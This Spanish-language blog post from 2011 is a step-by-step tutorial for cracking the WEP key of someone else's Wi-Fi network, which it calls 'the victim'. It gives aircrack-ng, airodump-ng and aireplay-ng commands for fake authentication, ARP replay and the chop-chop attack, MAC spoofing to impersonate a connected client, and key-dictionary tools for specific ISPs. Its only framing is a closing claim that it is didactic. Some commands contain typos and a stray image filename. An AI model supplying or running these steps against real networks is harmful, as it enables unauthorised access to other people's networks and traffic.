sábado, 10 de diciembre de 2011

Sacar clave WEP Ubuntu

En esta parte os mostraré como sacar una clave WEP de una red cualquiera.
Antes que nada instalamos una serie de cosas que nos servirán:

sudo apt-get install aircrack-ng macchanger


***Si quieres instalar los diccionarios, os dejo aquí el repositorio y los diccionarios para instalarlos (tambien lo podéis buscar con el y-ppa-manager):

Ver más

sudo add-apt-repository ppa:ed10vi86/wifi
sudo apt-get update
sudo apt-get install wlanwpa wlandecrypter liksysdecrypter jazzteldecrypter ono4xx wlan4xx decsagem stkeys r-wlanxdecrypter crunch

Y ya tienes todos los diccionarios instalados y listos para usar.



Primero abrimos una terminal y tecleamos:
sudo aimon-ng start wlan0
Ahora te aparecerá un mensaje de procesos y esas cosas y que el modo monitor está activado.

Ahora escanearemos redes:
sudo airodump-ng mon0
Cuando estés satisfecho con las redes escaneadas, pulsa ctrl+c


Elige una víctima.
Y escribes:

sudo airodump-ng --bssid 00:12:59:A7:B9:93 -c 2 -w captura mon0

El BSSID es la dirección MAC de la víctima, la c es el canal, y la w, el nombre para guardar el archivo que se creará. Esta ventana no la cierres.


Las dos direcciones MAC que hay abajo son clientes conectados, nos facilitará la captura.
Abre otra pestaña. Archivo>>Abrir pestaña.
En la nueva pestaña escribe para darnos permiso para acceder a la red:

sudo aireplay-ng -1 0 -a MAC de la captura -b MAc del cliente -h La MAC de tu ordenador o dispsitivo Wi-fi mon0

Nos saldrá un mensaje de:

Authentication succesfull :) 

O algo parecido. Si no nos ha aparecido, intentamos hasta que nos salga, o cambiamos nuestra mac por la de uno de los clientes para engañar al router:

sudo ifconfig mon0 down
sudo macchanger -m MAC DEL CLIENTE mon0
sudo ifconfig mon0 up

Una vez tengamos permiso, escribimos esto:

sudo aireplay-ng -3 -b MAC de la captura -c MAc del cliente -h La MAC de tu ordenador o dispsitivo Wi-fi mon0

Comenzará a enviar paquetes, tardará bastante, así que relájate y tomate algo mientras.



Una vez haya leído 20.000 paquetes o así, dependerá de la red, de la cobertura y esas cosas, empezará a enviar paquetes, así que abrimos otra terminal, y escribimos:

sudo aircrack-ng captura-01.cap

Si queremos agilizar el proceso creamos un diccionario para dicha red dependiendo cuál sea:

WLAN_XX -----> wlandecypter
ONOXXXX-------> ono4xx
JAZZTEL_XX ------> jazzteldecrypter
(hay bastantes más, pero pongo las que mas se repiten)


Usamos esos programas, se encuentran en los repositorios de Wifi, buscalos con el famoso Y-PPA-Manager que ya expliqué en mi otra entrada.
Pasado un rato, tendremos dicha clave.
Objetivo conseguido.

Para sacar la WEP con diccionario:

sudo aircrack-ng captura-01.cap -w Ruta del diccionario

Bueno pues imaginaos que ahora resulta que no hay clientes conectados, y el ataque de autentificación falla porque no hay nadie conectado, pes bien hagamos el ataque llamado chop-chop.

Hasta el momento de elegir redes es todo igual, así que llegamos al

sudo airodump-ng --bssid 00:12:59:A7:B9:93 -c 2 -w captura mon0

Y como siempre abrimos otra pestaña, bien comencemos:

sudo aireplay-ng -1 10 -e NOMBRE DE LA RED -a MAC DE LA RED -h MAC DE TU DISPOSITIVO mon0

Ahora abrimos epestaña nueva, no cierres ésta, y escribimos:

sudo aireplay-ng -4 -h TU MAC mon0

Cuando acabe, se crearán dos archivos, uno *.xor y otro *.cap
Pues si los ha creado poned:


tcpdump -s 0 -n -e -r ARCHIVO.CAP

Te dará la IP, anótala que te hará falta, y ahora escribes:
packetforge-ng -0 -a MAC DE LA RED -h TU MAC -k IP COPIADA DE ANTES -y ARCHIVO.XOR - w NOMBRE PAQUETE
Lo que hemos hecho ha sido fabricar un archivo ARP, pues ahora toca lo siguiente, escribimos:
aireplay-ng -2 -x 1024 -h TU MAC -r ARP CREADP mon0

*El 1024, es dependiendo de lo que tenga cada uno, se empieza por 300, y se va subiendo de 100 en 100 por ejemplo, hasta qe no te de fallos.
Bueno ahora lo más coñazo, esperar, esperar y esperar, así que cuand hayas esperado bastante teclea esto:
jdownloader.pngaircrack-ng *.cap 

***Nota: el diccionario también nos sirve aquí, así que si tienes herramientas para crearlo, adelante, irá más rápido y necesitarás menos IVS.

No me responsabilizo de lo que hagáis con este tutorial, es didáctico.





No hay comentarios:

Publicar un comentario